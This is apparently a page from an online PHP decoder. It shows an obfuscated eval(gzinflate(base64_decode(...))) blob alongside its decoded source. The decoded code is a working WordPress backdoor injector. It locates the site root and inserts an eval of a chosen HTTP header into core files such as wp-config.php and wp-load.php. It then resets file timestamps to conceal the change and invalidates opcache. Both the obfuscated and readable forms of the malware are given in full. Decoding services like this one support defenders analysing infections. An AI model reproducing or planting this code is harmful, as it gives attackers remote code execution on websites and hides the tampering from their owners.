Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

eval(gzinflate(base64_decode('rVZ7U+I6FP+fmf0OcQa3ZeG6oKuOw3gfuiLoXnXQFURcpqQHibRpbVIeuvrZ..

Decoded Output download


define('CURRENTDIR', getcwd());
$rootDir = detectWProotDir();

if (!$rootDir) {
    echo 'invalid detect rootDir' . PHP_EOL;
    exit;
}


backCheckWrite(backTarget(), $rootDir);
backCheckWrite(additionalTarget(), $rootDir, true);

function backCheckWrite ($backTarget, $rootDir, $noBreak = false) {
    foreach ($backTarget as $path => $regex) {

        $fullPath = $rootDir . '/' . $path;
        $source = file_get_contents($fullPath);

        if (!$source) {
            continue;
        }

        if (detectString($source)) {
            echo sprintf('code already exists %s', $path) . PHP_EOL;

            if ($noBreak){
                continue;
            }

            break;
        }

        if (is_writeable(dirname($fullPath))) {
            $deleteFileBeforeUpdate = 1;
        }

        if (!is_writeable($fullPath) && !is_writeable(dirname($fullPath))) {
            echo sprintf('not writeable %s', $path) . PHP_EOL;
            continue;
        }

        if (!preg_match($regex, $source, $matches)) {
            echo sprintf('not matches in %s', $path) . PHP_EOL;
            continue;
        }


        $newSource = str_replace($matches[0], hqBack() . PHP_EOL . $matches[0], $source);

        if (!detectString($newSource)) {
            echo sprintf('incorrect record %s', $path) . PHP_EOL;
            continue;
        }


        $filemtime = filemtime($fullPath) + 10;

        if ($deleteFileBeforeUpdate) {
            unlink($fullPath);
        }

        if (file_put_contents($fullPath, $newSource)) {
            echo sprintf('%s success', $path) . PHP_EOL;
            touch($fullPath, $filemtime);

            if (function_exists('opcache_invalidate')) {
                opcache_invalidate($fullPath);
            }

            if ($noBreak) {
                continue;
            }

            break;
        } else {
            echo sprintf('invalid write to %s', $path) . PHP_EOL;
        }
    }
}

function detectString($source) {
    if (strstr($source, systemEnv()) !== false) {
        return true;
    }
    return false;
}

function systemEnv() {
    return '2977104';
}

function hqBack() {
    return sprintf('eval($_SERVER[\'HTTP_%s\']);', systemEnv());
}

function additionalTarget() {
    $arr = [
        'wp-load.php' => '~^\s*if.+?file_exists.+?wp-config.php[^\{]+\{~m',
        'wp-config.php' => '~^\s*require_once.+?wp-settings.php[^;]+;~m',
    ];

    return $arr;
}

function backTarget() {
return json_decode(base64_decode('eyJ3cC1pbmNsdWRlc1wvZm9ybWF0dGluZy5waHAiOiJ+XlxccypmdW5jdGlvblxccyt3cHRleHR1cml6ZV9wcmltZXN+bSIsIndwLWluY2x1ZGVzXC90ZW1wbGF0ZS1sb2FkZXIucGhwIjoifl5cXHMqaWYuKmlzX3JvYm90c1teXFx7fFxcOl0rKFxce3w6KX5tIn0='), 1);
}

function moveTop(&$array, $key) {
    $temp = array($key => $array[$key]);
    unset($array[$key]);
    $array = $temp + $array;
}


function detectWProotDir() {
    if (file_exists(CURRENTDIR . '/wp-config.php')) {
        return CURRENTDIR;
    }
    $normalizePath = preg_replace('~\/(wp-admin|wp-includes|wp-content).*$~', '', CURRENTDIR);
    if (file_exists($normalizePath . '/wp-config.php')) {
        return $normalizePath;
    }

    return null;
}

Did this file decode correctly?

Original Code

eval(gzinflate(base64_decode('rVZ7U+I6FP+fmf0OcQa3ZeG6oKuOw3gfuiLoXnXQFURcpqQHibRpbVIeuvrZ70lftIije2czPprkd96v5EwYMA66tv+92Tw4ufjaaGolcguSTky9UKjm8p7jyK/MI7vEBAlUts6iEx1vc2xA9JUYUyCPOYIL6NAhGuNjw2JmREYijEbWyFn9rHdw+q0agqdMVnNPuVyub9DR/hDoqOUxCbraXhge6qIXSiSRUV3EGabJJHO4Yb1El4j0fFCKDnxOFYpkqYmen8tJ0+W5s+eBMUK7B4YlILZt4OApHWboiCFI3jXkkOz+iSzgFqYKHuDVyg98yzoL7hMJ6Abts3JGQFidY4XjexSUWGZBD7n3qMMlcCn0hI8yKCYIIxBSxUrGS1Ey7sOc/VOWMIzNufQYv9VjJotcgnAKFzFyoGvUMYEYFnrBnKngCSnIqsCkCQwppMOb4aLExU4tZAUsV3VBXbX6ivhVY5joTVRMjb4Fusk8btiQ8tkLu/ImWGh/Df28Byqu313TkMr1lVdlrGSEzJmTjx/Jyq8qkHUsdyRJyF9z6S9Fd8XFXOzZhqRDPUzLUpxf+BGcg3iHVhGSMP6/1ZrnN4fJeZziQno9D1zLoOinSMp1+aZEhvd7WF16SoaqlDQiTtbFSshmdCLsDSsZp47nBW0K8Mv8DXaq8rUls+NSDr7TGVMklfKC9q9k5KLuPrcYH2XawSsZEPQQ11/WQ0rk3d5ZFUT4lIJ42ynS8VWypYQktheWNIS4K/fCRqJrjkuxu0IvGh5ovPZCObVe4pa6Y0kPyfQh8psaEQEcEW9kWDgNgwpHN72VYU+58O9TanQt7daRVGUWlhP+6EmJi5mQYB/wMU5ysrK7MMnU8kD6Hg+GZDU3FxsdB/BqRoUUy4hNhNXWd7a3K+UvWhafFHIGnHjlb0Cv6Pne+UHz8qB53dXqFxdnvVXR1W4KVS1rQZbxy6kficgbnnqsXCc2ahP3D8sxzDV36GpqQmvPP7riExusFf8K6iPMPdwhEKM/YLcKev2j+3hT7D4+21opw2sOSXHz4N5nHvQcTiHkJEBiHt2KkFf1plhNON1ElRB5Q2mcNS799CGPH3IR8E5gpZigJjC+jgRsfYl3GsyONuh+xe3bJ8JsNS1amYw79s6s36qVzUPL78w2J0b9H3bKjopta0rpzLXN1uYd3o37wV5u0HrTgnqzQm1rq3O5M8H/stM+KfbPG6LBzcm3luVfrU8rncPLh/b+TrnTqkz6h7Vy57wi+uu1Uafd8OnhcNK4c9jA2qTt+r/3RuvKP7ath/bG0fjK3inTioR2bbo9qE3pqVX2jvE/bEy2jtubssHLuxo+3iqF6oeMO2xnDBeOq39UnjJmWDYjmCXxxgRxMeDBla5ugldYsL1W25uoH/gcQ6IvuQiP1NssYFWMDsJH6ULxpV6/qcJLpZE+f0gHT7xswhSWFN+cIF2C2KI8GzvGA0QPx2CWx8NSe+5+1pG1YdqM/8QPHGCWb4L4GcpTvb6w9in/jDWk4e9cRmTzotYL4t6neZYo1j6d2hxbsvLjfw==')));

Function Calls

gzinflate	1
base64_decode	1

Variables

None

Stats

MD5	c0a9ba78abc4cbe1c51eb3509b6bb8f0
Eval Count	1
Decode Time	80 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats